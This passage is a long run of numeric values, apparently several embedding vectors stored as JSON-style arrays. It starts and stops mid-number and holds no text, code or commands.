.0061916597,-0.080441065,0.031970877,-0.006950467,0.010119127,-0.03267589,-0.026963394,0.0032186455,0.020314643,0.048836414,0.042362195,-0.082816176,0.018638236,-0.020581301,0.001634879,0.0048435065,0.0775579,-0.020640783,0.06786343,0.017784221,-0.019803263,-0.08633884,0.055833727,0.025420515,-0.015696378,0.089757435,0.024813013,-0.038560476,0.027433632,0.089584626,0.000896881,-0.013524632,0.035060048,-0.021668635,0.0005217473,-0.027799226,-0.016240917,0.012880419,-0.032555375,-0.051443014,0.0364943,0.031550188,0.016753837,-0.009382124,0.07427517,-0.00023258249,0.020345585,0.009824189,-0.03525514,0.016466858,0.032629568,0.027952006,0.008084392,-0.015768081,0.00005537118,0.03865418,-0.08170986,0.029525157,0.045721773,-0.0016908692,-0.032054726,-0.047699958,-0.007739472,-0.010485034,0.018718569,-0.0040352745,0.01262952,0.028710596,-0.0017447207,0.007528733,0.01598799,-0.0049628126,-0.035327516,0.05090314,0.0050706635,0.03180298,0.04811035,-0.010316621,-0.0023323433,-0.014523591,-0.031743757,0.0508862,-0.01776038,-0.033167902,-0.012983461,0.043347586,0.01700225,0.051893406,-0.046909966,0.020332675,0.046605315,-0.0440077,-0.001386306,-0.004281755,-0.02896902,0.025513543,0.04091349,0.027569553,-0.06304981,-0.05319116,0.011680688,-0.044015296,-0.004698083,0.029690212,-0.024946088,-0.014105776,-0.00051090354,-0.06205612,0.033007883,-0.026380105,-0.054235656,0.05209433,-0.04259066,-0.006465096,-0.00042830533,0.0117961345,0.016564306,-0.007300841,-0.0011285637,-0.008448548,0.0075681745,0.07985763,-0.010511808,0.007413659,-0.044522367,0.043311786,-0.0062340284,-0.06857403,-0.0010925947,0.054875705,0.01173767,0.0011393377,-0.042252254,0.003497122,-0.032132152,-0.02951438,0.002328894,0.02618803,0.021269664,-0.029141406,0.029132325,-0.05490692,0.062989675,-0.031021873,0.083010316,0.03602725,-0.019070994,-0.012369808,0.019587567,-0.03738102,0.026900979,-0.078895964,0.0055124555,-0.004918527,-0.018623829,-0.014426548,-0.01416617,-0.03285415,0.011000412,0.00021817243,-0.0024470373,-0.023720788,0.009178338,-0.0044384142,-0.0020772326,0.02983377,-0.02180831,0.035459593,-0.017596908,0.014195699,-0.046263594,0.03572815,0.05355335,-0.026049864,-0.004896512,-0.012256938,-0.0006707378,-0.008235387,0.020206615,-0.021083858,-0.030403838,0.01676582,0.0119501315,-0.005949025,0.06436293,-0.0084994845,0.007335935,0.002101978,-0.054048568,-0.017360453,-0.019970978,-0.042960655,-0.036838602,-0.108576395,0.039570555,0.05929468,-0.031538416,-0.010799707,-0.037564836,0.0991583,-0.0063030026,0.041478224,0.014076108,0.027248258,-0.03388957,0.0104856705,-0.049735904,0.04309627,-0.029264813,-0.03178324,-0.008923574,0.0073867547,-0.015025678,0.00035444263,0.02475271,-0.008054053,0.060212914,-0.061138045,-0.03794867,0.016375687,0.013606839,-0.012292419,0.044854145,-0.030717704,-0.014512986,-0.023313986,-0.014469129,-0.063900284,-0.051768016,0.051556267,0.043719098,-0.004091678,-0.005461099,0.04799172,0.058513246,0.069929406,-0.012596799,0.017461233,0.005028965,-0.019175427,-0.07598464,0.0051470036,-0.052485187,-0.009088498,-0.011867205,0.0043936837,-0.0061015785,0.005531307,0.038495716,0.0013978477,0.009244214,0.014353787,0.082511365,-0.051884178,-0.054569058,0.051774174,-0.0098194,-0.0004291805,0.020222677,0.005166985,0.0052730385,0.010320851,0.043024167,0.009947091,0.025288483,0.05778724,-0.082947336,0.021621907,0.037417877,0.036700726,0.019882794,-0.010539662,-0.044838585,-0.03025166,0.024472982,0.025970632,0.006335458,0.008415356,0.014488056,-0.009028334,0.002363703,0.03574362,-0.0060546407,-0.044683494,-0.0097822435,-0.02640179,-0.006495739,0.050050884,-0.045029942,0.045923013,-0.0049094646,-0.08312359,0.012522903,0.022547595,0.036851402,-0.009366529,-0.046860255,0.043624364,0.02796083,-0.019423347,-0.013247326,0.01945735,0.037464906,-0.025348533,0.016918734,-0.015566764,0.023079535,0.00919133,-0.019061781,0.009055806,0.033295948,0.038125504,-0.03549153,0.027381836,-0.0066854144,-0.04896893,0.025917519,-0.008328109,0.0156188905,0.033431787,0.019856026,0.018161092,0.08367607,0.027034882,0.026365586,0.014441888,0.023637688,0.02790073,0.04049449,0.039394494,0.02722054,0.032130834,-0.014336031,-0.02847131,0.02497537,0.030191908,-0.020954698,0.008229001,-0.046513,0.0038072667,0.0035696914,0.018451732,0.025168555,-0.036845677,-0.004952169,0.029534912,0.028128967,-0.0008084147,0.03241101,0.02662218,-0.008196413,0.041386288,-0.004630129,-0.009745896,-0.01210727,0.040910322,0.014885945,-0.015298968,0.0070272796,0.007029283,-0.025786007,0.04784991,-0.05224976,-0.038138945,0.042663522,0.0066059474,0.0065444773,0.021758825,-0.025984759,-0.008162222,0.06850947,-0.0033692091,0.04208706,-0.007819784,-0.024829557,-0.01630548,0.047394298,0.0014633638,0.035214897,-0.005150627,-0.006167556,-0.027953306,0.02328282,-0.018097421,0.01904921,-0.0044423477,0.008619944,0.016462136,0.055053446,0.07220371,0.021272544,-0.10255036,-0.00071752135,0.023323454,0.045682285,-0.020764071,0.029958861,-0.044085555,0.008823556,0.03550086,-0.025073703,0.047008503,0.031140808,-0.065024815,-0.070891954,-0.0017712739,0.036817737,0.032142505,0.1221378,-0.05185207,-0.055179197,0.043891657,-0.014701024,-0.016861908,0.025961382,0.0154540995,0.09168019,-0.045554854,0.0067030434,-0.052446388,0.016719343,0.03641611,0.010349557,0.0030925046,-0.06205385,-0.040729545,0.0019829792,-0.010615389,-0.024458457,-0.020453718,0.071467735,0.08623582,-0.06202055,-0.019139342,0.015078067,-0.007208297,0.013658279,0.011046393,-0.010427281,-0.0026079519,0.0076183677,0.04966183,0.02041729,-0.020904114,-0.068427555,-0.05471512,-0.043004066,0.027453009,0.0068168137,-0.008327857,0.02121646,-0.0032817444,0.008748235,0.0076144706,0.010912537,-0.0027901188,-0.0039838646,-0.021802697,-0.0155498,-0.0019340572,-0.040487334,-0.010918529,0.020831121,0.014936898,-0.03114909,-0.018757818,0.009029513,-0.08786469,0.058155812,-0.026529072,-0.038405452,-0.0397195,0.015310323,-0.027092367,0.044049736,-0.0034357307,0.066248216,-0.03066189,-0.0050934246,-0.031830966,-0.04272125,0.011651932,-0.028430108,-0.016932117,-0.02722633,-0.02679791,-0.035206214,0.013079204,0.01198353,-0.011200699,0.047792636,-0.0054727234,-0.004755295,-0.008936776,-0.07836676,0.01043033,0.04543533,-0.048728026,-0.02826444,0.049190447,-0.030833054,0.029557602,0.012882339,0.010378528,-0.017376592,-0.034995507,0.022950627,-0.04386953,-0.03179947,0.036418986,-0.03341775,-0.032116827,0.033827625,-0.086096205,0.029463619,-0.060415596,0.0021364905,-0.05342367,-0.011773825,0.017659679,-0.050619643,-0.035644498,-0.037196584,0.012449738,0.11037938,0.0030359873,-0.009242181,-0.0024293247,-0.021130536,0.043267734,0.025389448,0.038838144,-0.016722895,-0.031265844,-0.02733019,-0.031507112,-0.036329594,0.0010719486,0.021655707,-0.010065605,-0.020587392,-0.01882077,0.045623317,-0.048886545,0.022438074,0.07034883,-0.028212754,-0.0014990057,-0.008756239,-0.06640707,0.004304317,0.011758379,0.023557495,0.005885317,0.01615349,0.028814614,0.017002545,0.048574887,0.016334396,-0.006061439,-0.04880023,-0.061475977,-0.004210285,0.004809755,0.014540818,-0.0017251583,0.007503897,0.0579906,0.0028114803,-0.0018485555,-0.008343103,-0.02235945,0.011161773,0.007418373,-0.020467082,0.008278962,0.044491824,-0.014867245,0.03629799,0.031225832,0.016242996,-0.00016814786,-0.035471503,-0.051863123,0.03226186,-0.035128254,0.03643589,0.0101919575,-0.013027284,-0.05040099,-0.042302053,0.05744822,-0.045016468,0.03483189,-0.04460067,-0.10879005,-0.08193711,0.023887096,0.022960559,-0.017176628,-0.053220935,0.04005505,0.058838837,-0.0007706677,-0.014499655,0.006264941,0.02529807,-0.0043023597,0.004046028,0.03628434,0.057298284,-0.0016749249,0.0832117,0.08769619,0.003577166,-0.045175742,0.03586198,-0.066403076,0.051000897,-0.0048974506,-0.09255706,-0.039201587,0.0026984778,0.0057809292,-0.03048348,-0.009416302,0.02522518,-0.02019466,-0.0016360352,0.004591474,-0.034730464,-0.035965025,0.015812583,0.057346474,0.0062423213,-0.044404738,0.012644182,0.022085063,0.075371005,0.0130856,-0.017311303,-0.004133264,-0.010404899,-0.016973682,0.0108368,-0.04646325,0.0064106607,-0.036050998,0.022466803,0.019474318,-0.013538616,-0.011352637,-0.046053655,-0.006135784,0.0012875721,-0.043164384,0.019777954,0.039148115,-0.014844193,-0.027200673,-0.01796,0.041236423,-0.011259708,0.025248293,0.017014043,0.010741185,0.0140141575,-0.015348819,0.0123128295,0.04578229,-0.027260184,0.022525335,-0.019673625,-0.023227494,-0.055635717,0.042613663,0.024197554,0.012175914,0.0022204174,0.016406316,0.030450867,0.0069996538,0.05771507,-0.016417583,-0.060188532,0.0072175665,-0.014910495,0.012220098,0.020574803,0.0006370921,0.030518541,0.011230352,-0.014983287,-0.022002717,-0.013156404,0.036762644,0.02928583,-0.007893958,-0.052220553,-0.041463856,-0.06251704,-0.037919655,-0.06773013,0.00998231,-0.035674922,0.026543071,-0.00808469,-0.03317982,-0.05680256,0.021021886,-0.016970033,-0.043751184,0.080982424,-0.027462872,0.014611794,0.026669722,-0.018662132,0.0044906773,0.04325658,-0.00776121,0.10304799,0.032607518,0.027091622,-0.029379703,-0.018076623,0.0047785495,-0.012229456,-0.06379815,-0.037105106,-0.022382157],[0.023173077,0.035084,-0.1768484,-0.046164002,0.07651102,-0.08681085,-0.015487134,0.043179337,-0.03083281,-0.028552577,-0.04048577,0.05600889,0.05844562,0.008787435,0.0015070223,-0.017627114,0.03774607,-0.03335062,0.0015428903,-0.00011264395,0.011856583,-0.041806296,-0.01649637,-0.03852088,0.07417041,0.018992463,0.013912068,0.014005119,-0.0203423,0.06808905,0.027342385,-0.0650239,-0.02193961,-0.046826698,-0.09283257,-0.024467295,0.050608724,0.04340137,0.009625002,-0.036452882,0.0329697,0.047522802,0.025493132,-0.030008456,0.020920392,0.018908959,0.052888162,0.014775766,0.037975233,-0.080382645,0.002324242,-0.050054405,0.052211776,-0.046952467,0.08871147,0.03991347,-0.034106053,-0.023612544,0.0044562346,-0.005232482,0.06746016,0.039654516,-0.022013864,0.053422388,0.012936919,0.0055556144,-0.01804823,0.03939508,0.02916088,-0.02754871,0.040478975,-0.04324877,-0.042995762,0.0026808488,-0.027748886,-0.010595814,-0.028004013,-0.05800184,0.028508445,0.033996247,0.021147678,-0.04912205,0.07478084,0.009456239,0.01299026,-0.03691153,-0.017801613,-0.011571788,-0.027565952,0.06424412,-0.016497064,-0.02046007,-0.0013077453,0.058526956,-0.09018736,0.02614136,0.035629667,0.013950698,-0.03948682,-0.011008766,-0.017108146,-0.014761169,0.022375854,-0.034747727,0.00089455966,0.03979929,-0.029579604,0.0015033241,0.018754015,0.02151144,0.0011513192,0.05589831,-0.023679478,-0.032843135,-0.022467768,-0.042055763,0.020698622,-0.035500325,-0.018523743,-0.005955586,0.0012062463,-0.030605717,-0.031864118,0.06564371,0.014973658,0.021135861,-0.066179946,0.015361352,0.015484059,-0.040714163,-0.001815175,0.034551382,-0.027124325,0.034993388,0.036683932,0.06926429,-0.041407757,-0.022167625,0.0013154189,-0.03363804,-0.015036895,0.011483517,0.014218868,-0.026727237,-0.018411709,-0.036845792,-0.0037834344,-0.030522095,-0.057393465,0.031087846,-0.032880355,0.029513905,-0.019827697,0.031943887,0.033402417,0.0061565987,0.061116863,0.0055990485,-0.009976033,0.097589344,0.01741495,0.019286374,-0.06528329,0.056217417,-0.028681153,-0.050019592,0.018748587,0.08575073,0.0018906419,0.03910773,-0.022204893,-0.02410519,-0.0132306935,-0.02065265,-0.018941134,0.017602727,0.05324611,-0.024297396,0.0015624345,-0.01975237,0.06576894,-0.055484205,0.07929049,0.02897333,-0.03633359,0.009156984,0.031440742,-0.03328696,-0.0020336462,-0.021810854,0.020138672,-0.0032332442,-0.03927038,0.025541231,-0.013334217,-0.06586501,0.03380386,0.025336867,0.021419456,0.0066665187,-0.03946658,-0.0060513564,-0.011285567,0.0009834697,-0.06632842,0.06763409,-0.024607863,0.044027887,-0.022575099,0.06021976,0.06643709,0.0007126782,0.022130383,-0.00036027873,-0.0076836194,0.0047301217,0.009733932,-0.015585252,-0.050039764,0.015317345,0.045335352,-0.01446216,0.010500695,0.014950311,0.048161656,0.015665404,-0.017797004,0.0021497589,0.0039687497,-0.017710444,-0.032339536,-0.06268866,0.04994982,0.004761184,-0.03168496,0.00034634914,-0.0015434969,0.086536095,-0.028926922,0.032514594,0.038654126,0.03799669,-0.034278136,0.0075365333,-0.01944825,0.005323498,-0.046247575,-0.028558688,-0.0041085933,0.031121718,-0.044364106,-0.005833139,-0.0077977893,0.007308385,0.032065626,-0.060700778,-0.0055353018,0.0018750946,-0.0030645814,-0.0038096586,0.043844037,0.01227905,0.01129452,-0.073811226,-0.028373415,-0.053214587,-0.03305821,0.025022496,0.027007138,0.022815034,-0.0019021463,0.061427966,0.060967147,0.0561409,-0.017042695,0.0016926734,0.008841804,-0.025484102,-0.028062914,0.0020287884,-0.0622181,0.000773202,-0.007941711,0.0069024735,-0.012109824,-0.012002469,0.028187912,-0.006101626,0.015888404,-0.023784732,0.013102748,-0.031429436,-0.038909536,0.037133053,0.0076766177,-0.022551872,0.06700227,-0.006311066,0.034777507,-0.029547041,0.028728265,0.046811078,0.021266753,0.013684555,-0.030821702,-0.006878397,0.03551043,-0.004482011,-0.028107813,-0.014220698,-0.03544207,-0.010051113,-0.014419978,0.015527032,-0.047008444,-0.0029279306,0.030755304,-0.003838693,0.019918265,-0.031953044,0.009431009,-0.045418017,0.01774527,-0.04837109,-0.043237556,0.0740492,-0.014786408,0.033123687,-0.053778186,-0.04991145,0.057768054,0.038766332,0.048102904,-0.036277328,-0.046530575,0.021369029,0.029150479,0.007943949,-0.021927757,0.01653802,0.01591084,-0.016338205,0.025801174,-0.0416636,0.046927404,0.039096747,-0.048414078,-0.0014838045,0.041998282,0.044625398,-0.06464668,0.031081183,-0.03272544,-0.0070358133,0.031676322,0.01701681,0.0068094856,-0.012927713,0.029437998,-0.0134503115,0.062494457,0.03674149,0.032263834,0.00035899607,-0.030766983,0.052228987,0.06799485,0.009978023,-0.008906407,-0.0122686215,0.003134018,-0.0749315,0.03707593,0.015745476,-0.009704087,0.012209559,-0.064698316,-0.025790825,-0.0007976732,0.024823131,0.008423909,-0.07161145,0.0148253925,0.011859098,0.01516285,-0.036189668,0.040768083,-0.019341057,0.038160965,0.04159831,-0.02481285,-0.0005786395,-0.021958776,0.0428924,0.0059489957,-0.005824249,0.00020511477,-0.019177806,-0.055126406,0.009546487,-0.02928201,-0.0466495,0.024784133,0.040209744,-0.019306375,-0.013200586,-0.03832051,-0.037184365,0.0771747,-0.019409804,0.03127604,-0.011388959,-0.040500514,-0.04687616,0.033512693,-0.012591166,0.093780495,0.012466568,-0.017648682,-0.022968609,0.019194284,0.035047386,0.007956831,0.00423412,-0.007350012,-0.009280728,0.00960362,0.047643974,0.06898366,-0.06137932,0.056322068,0.011592426,0.022406707,-0.032077655,0.016509753,-0.04719835,-0.0076967156,0.019755006,-0.0007791396,0.018514812,0.041190676,-0.0047365376,-0.048797663,-0.0014413217,0.05398871,0.06406375,0.09362699,-0.04085992,-0.036657594,0.053025454,-0.030160656,-0.01148275,0.037956577,0.0029122506,0.13120928,-0.020151066,0.00801087,-0.0020551593,0.053864464,0.049844433,-0.009887395,0.03983274,-0.061439287,0.007139405,0.019710911,-0.0054264353,0.011977695,-0.032490984,0.031548727,0.08641414,-0.051982664,-0.019443309,-0.0016139474,-0.028013555,0.025856005,0.009137774,-0.0024075871,-0.0118785985,-0.027815055,0.06772789,0.0380123,-0.013911883,-0.01872813,-0.05640099,-0.009824243,0.036479153,0.011320532,-0.035880923,-0.02599461,-0.03541296,0.009408699,0.030940462,0.0019785534,-0.013632797,-0.020658808,-0.05735941,0.013276351,0.012661172,0.000965637,-0.009743544,0.015811803,0.028690169,0.0012619736,0.011364894,0.04450842,-0.045491643,0.019390393,-0.04719912,-0.0059046703,-0.056592662,-0.038376663,-0.031063307,0.027933322,0.0033977423,0.069382586,-0.037178688,0.025188157,0.0022516456,-0.08641101,-0.008330613,0.044533607,-0.039815396,-0.046082817,0.0005442419,-0.017894516,0.0042363824,-0.001759477,-0.045644976,0.030648392,-0.014242084,0.021340761,-0.038912777,-0.056006573,-0.01458823,0.043235075,-0.0036459048,0.015598124,-0.0014462796,-0.006618512,0.013545407,0.033548366,-0.0049209124,0.026905943,-0.023290062,0.016311307,-0.053942986,-0.030196566,0.0400356,-0.018492203,-0.056632306,-0.01417939,-0.045411736,0.014206342,-0.03789861,0.030588904,-0.00018711694,-0.0025896567,-0.016169146,-0.0198312,-0.039523754,0.00063453213,0.012184282,0.04945287,0.01900616,0.005785877,-0.04913918,-0.043879773,-0.023497583,0.017996334,0.036152627,-0.023716107,-0.055977914,-0.036609013,0.002951175,-0.012675299,0.00477723,0.026729504,0.028905898,-0.032579064,-0.048438884,0.005240736,-0.059260506,0.018189378,0.03505734,-0.0076882388,0.005703064,-0.041106835,-0.036179118,0.029517006,-0.013897425,-0.037980217,0.01993515,0.027946409,0.0016417367,0.028818734,0.031827103,-0.010615415,-0.02440728,-0.04346342,-0.061123572,0.015260616,0.04257365,0.030750232,-0.030731447,0.0010507986,0.07601867,-0.017589526,-0.0054277354,-0.01518759,0.014128696,0.008072029,0.00018569294,0.0038894766,-0.0001129351,0.026632845,-0.051045965,0.06508362,0.014070763,0.008551445,-0.027696688,0.010195038,-0.043349385,0.014859339,-0.03356092,0.055721566,-0.06047179,0.022992799,-0.025528912,0.00030592608,0.0018978199,-0.052499842,0.008697026,-0.041333746,-0.039448354,-0.079311326,0.024489384,-0.0048502213,0.04914501,-0.037836067,0.061054993,0.03874578,-0.013774022,-0.011279697,0.03401758,0.03289192,-0.031605694,0.031723533,0.061218347,0.063003585,-0.02734301,0.070929565,0.09495342,-0.02954703,-0.021791246,0.031904772,-0.029132118,-0.01255123,-0.041327436,-0.04843514,-0.020945627,0.004044218,0.023710795,0.008657585,-0.04905536,0.049420998,-0.0019251151,-0.0061413175,0.021736084,-0.06327615,-0.06621708,0.010032696,0.058758814,0.010161174,-0.047673557,0.030031431,0.01268568,0.036243208,0.021538088,-0.032515887,-0.030558642,0.021758085,-0.0127478605,0.0399112,-0.039095104,0.042476103,-0.009229837,0.011197688,0.010835442,-0.029904773,-0.020486483,-0.0134755615,-0.05792603,0.026430279,-0.030306507,0.013956319,0.06467182,-0.038671542,-0.032674626,-0.036426086,0.05551836,-0.041266218,0.025449235,0.042083178,0.049760282,0.022122156,0.008467512,-0.0016156498,0.0019421602,-0.00054452155,-0.020421682,-0.015620153,0.016803853,-0.03521716,0.020841936,0.04730659,0.02868865,-0.010675454,-0.02091177,-0.004670767,0.016833082,0.025252676,-0.008790972,-0.03756195,-0.009765766,-0.018734781,0.01680185,0.025771592,-0.0070941257,0.039510682,0.0044294433,0.019221814,-0.04533546,-0.039723042,0.050315667,0.018631792,-0.011226657,-0.0564877,0.01075259,-0.064455606,-0.026388604,-0.04009178,0.023273773,-0.02009806,-0.033901464,-0.0013329642,-0.006115212,-0.039433606,0.028701887,0.007718296,-0.03622654,0.06521812,-0.06676225,-0.03219529,-0.006027856,-0.035263665,0.03403958,0.023252416,0.049946036,0.12012176,0.009976344,0.048509914,-0.014181925,-0.0033939264,-0.003911609,0.0055446327,-0.01147031,0.002823245,-0.06866617],[0.008931398,0.020955274,-0.15302983,-0.061702516,0.052598845,-0.060505435,-0.032715354,0.017268686,-0.0049166153,-0.05880317,-0.06322566,0.06636579,0.0039147045,0.027976979,-0.0045160986,-0.023362942,0.005660873,-0.04092579,0.0115027735,0.0004948165,-0.04727604,-0.041304145,-0.021470612,-0.0506708,0.06409717,0.017480955,-0.0011428219,0.01022528,-0.037787467,0.03848144,0.0694758,-0.050219372,-0.021548083,-0.0153858205,-0.08432027,-0.030780496,0.0038987135,0.024792908,-0.0076484545,-0.041342776,0.016433697,0.04078055,-0.011480152,-0.038009435,0.041076947,0.01651275,0.05388574,0.029209113,0.06743775,-0.06340946,0.013753278,-0.035134263,0.058810435,-0.050483808,0.10047905,0.043788075,-0.022494692,0.003252404,-0.010949976,0.0048620068,0.07064438,0.05637494,-0.007436912,0.069094256,0.024053223,0.005505131,0.00750968,0.04530188,0.03333004,-0.016052425,0.03848919,-0.033250634,-0.010291146,-0.000006867638,-0.019517727,-0.012838231,-0.004759034,-0.04872018,0.028428541,0.067635715,0.015065061,-0.06848683,0.07536814,0.0038439108,0.010595599,-0.039946962,-0.00788434,-0.028416255,-0.0037972038,0.023124574,-0.0022777803,-0.015548475,-0.030247297,0.05066413,-0.06541973,0.031083237,0.029323341,0.028888552,-0.03931163,-0.0041683014,-0.020635607,-0.020469759,0.040619638,-0.011915348,0.0026904752,0.041725002,-0.009114312,0.0012016522,-0.0015227697,0.004877583,-0.025878666,0.065683395,0.015449578,0.0048667067,0.037686706,-0.0056176283,0.027967656,-0.042188816,-0.0056037237,0.009239881,-0.013045275,-0.01445226,-0.025790889,0.04614991,0.03181426,0.0519434,-0.025196735,0.018108284,0.024060499,-0.07517801,0.0070547885,0.04066729,-0.017599849,0.022923747,0.04126446,0.055287857,-0.03499614,-0.011892534,0.008318959,-0.019663079,-0.02191194,0.019319175,-0.014324123,-0.020140532,0.01670206,-0.05304195,0.00010236314,-0.0518601,-0.06153027,0.03192306,-0.020040266,0.0013019611,-0.006285326,0.019019976,0.0089886105,0.0024702705,0.048244834,-0.00085284404,0.01537835,0.08977602,-0.010725852,-0.0047666524,-0.054957036,0.04743725,-0.0010798957,-0.034653183,0.027149042,0.06537797,0.024563927,0.045968883,-0.028626127,-0.023431197,-0.028125886,-0.039890572,-0.0031695506,0.029840812,0.03995511,-0.044267308,0.00995613,-0.016542362,0.03997662,-0.042483382,0.082451336,0.022783726,-0.022677574,-0.00009415874,0.025668409,-0.04047539,0.0026249303,-0.02657514,0.030561883,-0.016333947,-0.0686678,0.0038923686,-0.024610596,-0.0683818,0.0074384916,0.024143262,0.015699442,-0.0034205238,-0.05820415,-0.01625391,0.028377041,0.005067183,-0.055583883,0.0517092,-0.0023073393,0.0398289,-0.045051295,0.07881859,0.06572158,0.009953438,0.0070793605,-0.01711345,-0.029790776,-0.0020777981,0.03273535,-0.027257897,-0.09601003,0.0102698,0.04334807,0.023662942,0.0008567015,0.0025258583,0.046412576,0.026256997,-0.02807363,-0.0011031236,0.0079608755,-0.012374663,-0.036471922,-0.08682979,0.046430133,0.03966369,-0.03327521,-0.0052845404,0.004103913,0.09127901,-0.025807451,0.056286704,0.010489373,0.04174077,-0.026634311,0.016019901,-0.034386396,0.021731263,-0.06292417,-0.052158345,0.0033708157,0.021742096,-0.012340878,-0.020284222,-0.028202951,0.015652686,0.025673704,-0.061336346,-0.006514892,0.0038296664,-0.017650781,-0.03765344,0.03930453,-0.0057748714,-0.016811285,-0.020807168,-0.022236595,-0.09119836,-0.033188686,0.041835193,0.045853425,0.013473254,-0.0170872,0.06516713,0.065977894,0.047011886,-0.0060779112,0.0056396155,0.00812874,-0.023259098,-0.042359777,0.015486907,-0.06885768,0.03547438,-0.0017575163,0.026208593,-0.008456329,-0.0010866866,0.033793166,-0.014523131,-0.0002851161,-0.004068169,0.0027066977,-0.017990923,-0.050898466,0.05324969,-0.012076958,-0.0070718755,0.062785335,-0.00888064,0.04247087,-0.0028580814,0.025773503,0.037799034,0.00017506552,0.00800459,-0.05867154,-0.00069172756,0.03535884,0.0119666755,-0.010637901,-0.023261715,-0.041123465,-0.0047885343,0.0011775799,0.035326038,-0.023035377,0.02195106,0.024140427,0.024386188,0.027592646,-0.007906692,-0.02117442,-0.037058152,0.018846145,-0.0395375,-0.047563005,0.059986155,0.021758657,0.033427797,-0.027844746,-0.059674487,0.054553133,0.028723765,0.04076324,-0.013179291,-0.031062307,0.022780146,0.0020113422,-0.010344631,-0.03158658,0.0127761895,0.03937704,-0.005773927,-0.007423438,-0.008638748,0.03533246,0.029830245,-0.03743687,-0.002854641,0.05181869,0.04144936,-0.035586946,0.039911866,-0.034184325,-0.023129027,0.025914142,0.009699201,0.003822123,0.00006151367,0.014831317,-0.015357211,0.053218227,0.054348554,0.03469247,0.0063300794,-0.061314385,0.04493768,0.06623298,-0.0013301728,0.002372642,0.0070594572,-0.025166135,-0.057721056,0.05750317,0.021758493,-0.00017778766,0.021973925,-0.063274845,-0.05838877,0.008330745,0.013190431,-0.02940013,-0.08137619,-0.016690616,0.051129576,0.02271412,0.006019697,0.045652874,-0.034429558,0.04262031,0.041229576,-0.01593462,-0.01362238,-0.017026698,0.03037008,0.013298972,0.021043519,-0.012378085,0.005813698,-0.065726064,-0.0015133304,-0.044545718,-0.061028287,0.023698455,0.005354387,0.004633539,0.019659854,-0.021548668,-0.05183078,0.06335565,0.0032116706,0.008679958,0.0013037375,-0.028449936,-0.035201177,0.017652951,0.016048338,0.09752456,0.0023884657,-0.008869664,-0.03926592,0.027883891,0.023408463,-0.015080505,-0.00048338948,-0.03117879,-0.011716786,0.019422432,0.074330874,0.05401693,-0.058127157,0.02944684,0.025468336,0.05351276,-0.035691172,0.011776458,-0.013598007,0.0066876626,0.039500784,0.00058934686,0.02551563,0.027050054,-0.012223278,-0.030282207,-0.021328986,0.048770294,0.067885265,0.09778775,-0.06258651,-0.019004928,0.0074804127,-0.025251012,-0.00007116289,0.0412229,0.022437375,0.120779835,-0.02785303,-0.007239199,-0.035406772,0.031486694,0.060450844,-0.020197896,0.03772218,-0.052424498,0.02021269,-0.010785669,0.008436422,0.014196647,-0.026114939,0.05304118,0.06509663,-0.055495072,-0.004054146,0.03477023,-0.029795645,0.037516315,0.012890745,0.0067585753,-0.0063160616,-0.046671588,0.083325446,0.025622603,0.0049657915,-0.009734848,-0.023851909,-0.01521645,0.042547163,0.008152137,-0.020978639,-0.021583674,-0.030829802,0.024260322,0.06332363,0.042901736,-0.005921474,0.0018957533,-0.064681344,-0.015640806,0.017380504,0.008259845,0.02791927,0.02479106,0.0096918605,-0.026914336,0.021518808,0.05123135,-0.05042674,0.024746608,-0.05237418,-0.02305405,-0.038424212,-0.020649644,-0.06857229,0.0053419927,0.018295232,0.08560605,-0.034784313,0.009020898,-0.001379442,-0.09696217,-0.021153077,0.0117777465,-0.031357657,-0.03987205,-0.003536111,0.0046623154,0.004356389,-0.014265773,-0.06975367,0.03844868,0.005406407,0.0017471045,-0.028081559,-0.060979612,-0.009732574,0.0630157,-0.011502961,-0.015762633,0.019146608,-0.0384951,0.020278249,0.026200099,0.009646489,0.016051706,-0.050215773,-0.0022889292,-0.059130173,0.009395839,0.06151299,-0.043620486,-0.020557381,-0.004731878,-0.034815468,-0.033445053,-0.052855205,0.026802612,-0.016700968,-0.009918909,-0.023711242,-0.02765408,-0.042348616,-0.022647193,0.030453328,0.028953275,0.05000399,-0.006530731,-0.044007353,-0.02978443,-0.028116746,0.02314962,0.039900627,-0.03872646,-0.044632286,-0.04132464,-0.013101085,-0.01073675,0.010995577,0.0081459675,-0.01042926,-0.060542617,-0.038095847,0.021485647,-0.046547215,0.0071850424,0.06229168,-0.035579897,0.016158288,-0.05638458,-0.06815434,0.039250582,-0.020893903,-0.00068366464,0.01770127,0.033585984,-0.015604832,0.02529543,0.037324317,-0.013747039,-0.009791292,-0.04292256,-0.061332613,-0.010831109,0.019704025,0.04679971,-0.051751696,-0.01750998,0.058133896,0.00004834742,0.000031202613,0.008114005,-0.004817822,0.01654701,0.02715654,-0.0046046306,-0.022854682,0.011335023,-0.07202033,0.045754764,0.02443755,0.04149074,-0.034393422,-0.0054593044,-0.048422165,0.010524061,-0.035628136,0.038876846,-0.024887972,-0.0055266814,-0.041983508,-0.025711473,0.022438105,-0.042259015,0.033637095,-0.044676032,-0.05352711,-0.059216037,0.007178854,-0.0047081616,0.043025088,-0.03363149,0.07601768,0.028008627,-0.0071259914,0.0018229556,0.03754954,0.015820932,0.0033026119,0.041157726,0.04005672,0.060324345,-0.028746348,0.065285884,0.06285409,0.00090919225,-0.010371185,0.030723494,-0.016666716,0.044737678,-0.051228784,-0.05584089,-0.018171588,0.0075751045,0.022255564,-0.004051734,-0.062735304,-0.0021609066,0.026406437,-0.0028189763,-0.0004168049,-0.0765829,-0.032074753,0.0042624623,0.05027335,0.026278637,-0.038314756,0.027314069,-0.0009500724,0.03533488,0.032363586,-0.021400765,-0.029633172,0.011724269,-0.010036706,0.032075755,-0.04533274,0.048833173,-0.02221832,0.008682813,-0.011827449,-0.031859487,-0.013178542,-0.0055198767,-0.037032764,0.028345041,-0.032037396,0.018617224,0.050265543,-0.010490735,-0.02428801,-0.054208923,0.049606506,-0.047209714,-0.008185944,0.0022670103,0.07689188,0.016683929,-0.042989165,0.030357696,0.017393578,-0.04983686,-0.01970608,-0.0047299284,0.0035958905,0.0025473605,0.04578213,0.042951986,0.038205553,-0.008598722,-0.009453529,0.0018589427,0.026603306,0.04558042,-0.026740795,-0.027284794,-0.008579225,-0.035307653,0.0070285946,0.032074764,-0.0015404216,0.012717638,-0.008610036,-0.0050882143,-0.029438566,-0.022414519,0.034760747,0.022585237,0.00299845,-0.053232823,-0.024126815,-0.06540731,-0.017806333,-0.031919487,0.0469432,-0.011784901,-0.008290142,0.004905669,-0.035545353,-0.037143216,0.012775873,-0.0029878656,-0.043703806,0.060025208,-0.082864106,0.008614917,0.00923501,-0.024664242,0.011320791,0.00059356994,0.043482777,0.086569995,0.012271109,0.04185333,-0.03506724,-0.014496887,0.